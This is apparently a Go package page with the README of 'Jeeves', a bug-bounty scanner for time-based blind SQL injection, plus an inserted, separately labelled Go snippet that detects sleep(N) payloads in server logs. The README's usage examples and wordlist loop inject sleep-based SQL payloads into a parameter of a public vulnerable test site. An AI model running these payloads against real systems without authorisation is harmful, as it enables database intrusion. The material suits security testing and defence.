command
module
Version: v0.0.0-...-eed53a5
Published: Apr 27, 2022
License: MIT
Imports: 12
Imported by: 0
README
Jeeves
Jeeves looks for time-based blind SQL injection during recon.
- Installation & Requirements:
> go install github.com/ferreiraklet/Jeeves@latest
OR
> git clone https://github.com/ferreiraklet/Jeeves.git
> cd Jeeves
> go build jeeves.go
> chmod +x jeeves
> ./jeeves -h
- Usage & Explanation:
During your recon process you may find endpoints that could be vulnerable to SQL injection.
Jeeves reads its targets from stdin:
echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves --payload-time time_payload
The value of --payload-time must be the same time, in seconds, that the payload uses.
You can use a file containing a list of targets as well:
cat targets | jeeves --payload-time 5
You can use Jeeves together with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, to get the most out of it.
More usage examples:
Usage:
--payload-time, The time from payload
--proxy Send traffic to a proxy
-c Set Concurrency
-H, --headers Custom Headers
-h Show This Help Message
Ex 1 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
Ex 2 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves --payload-time 10
Ex 3 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port"
Ex 4 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"
You can specify more than one header. Note: be careful, the syntax must be exactly the same as shown here:
Ex 5 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"
TIP:
Using Jeeves with a wordlist of SQL payloads:
cat sql_wordlist.txt | while IFS= read -r payload; do echo 'http://testphp.vulnweb.com/artists.php?artist=' | qsreplace "$payload" | jeeves --payload-time 5; done
Notes:
- Jeeves does not follow redirects. If the status code is different from 200, it returns "Need Manual Analisys".
- Jeeves does not do HTTP probing; it cannot send requests to URLs that do not include the protocol ( http://, https:// ).
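From the defender's side, this kind of scan is visible in web server logs: the request carries a sleep(N) payload, and a response that took at least N seconds means the payload actually executed. The following is an added example, not part of Jeeves or its README; it assumes log lines of the form `<request-uri> <status> <seconds>` (for instance built from an access log that records request time), and `Classify`, `Finding` and the sample lines are constructed for illustration.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strconv"
	"strings"
)

// delayRe matches sleep(N) and pg_sleep(N); sleep(N) is the form used in the README payloads.
var delayRe = regexp.MustCompile(`(?i)\b(?:pg_)?sleep\s*\(\s*(\d+)`)

// Finding describes one logged request that carried a delay payload.
type Finding struct {
	Delay     int     // seconds requested by the payload
	Elapsed   float64 // seconds the server took to answer
	Confirmed bool    // true when the response was delayed at least that long
}

// Classify parses one line "<request-uri> <status> <seconds>" (assumed format); ok is false when no payload is found.
func Classify(line string) (f Finding, ok bool) {
	parts := strings.Fields(line)
	if len(parts) != 3 {
		return f, false
	}
	elapsed, err := strconv.ParseFloat(parts[2], 64)
	if err != nil {
		return f, false
	}
	uri := parts[0]
	if dec, err := url.QueryUnescape(uri); err == nil {
		uri = dec // keep the raw text when the percent-encoding is invalid
	}
	m := delayRe.FindStringSubmatch(uri)
	if m == nil {
		return f, false
	}
	delay, err := strconv.Atoi(m[1])
	if err != nil {
		delay = 0 // out-of-range number: report the attempt, never confirm it
	}
	return Finding{delay, elapsed, delay > 0 && elapsed >= float64(delay)}, true
}

func main() {
	const p = "/artists.php?artist=%28select%280%29from%28select%28sleep%285%29%29%29v%29" // constructed
	for _, l := range []string{p + " 200 5.031", p + " 200 0.012", "/artists.php?artist=2 200 0.009"} {
		fmt.Println(Classify(l))
	}
}
```

A line with `Confirmed` set is a request where the database really slept, which is worth treating as a working injection point rather than as scanner noise.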
This project is for educational and bug bounty purposes only! I do not support any illegal activities!
If there is any error in the program, talk to me immediately.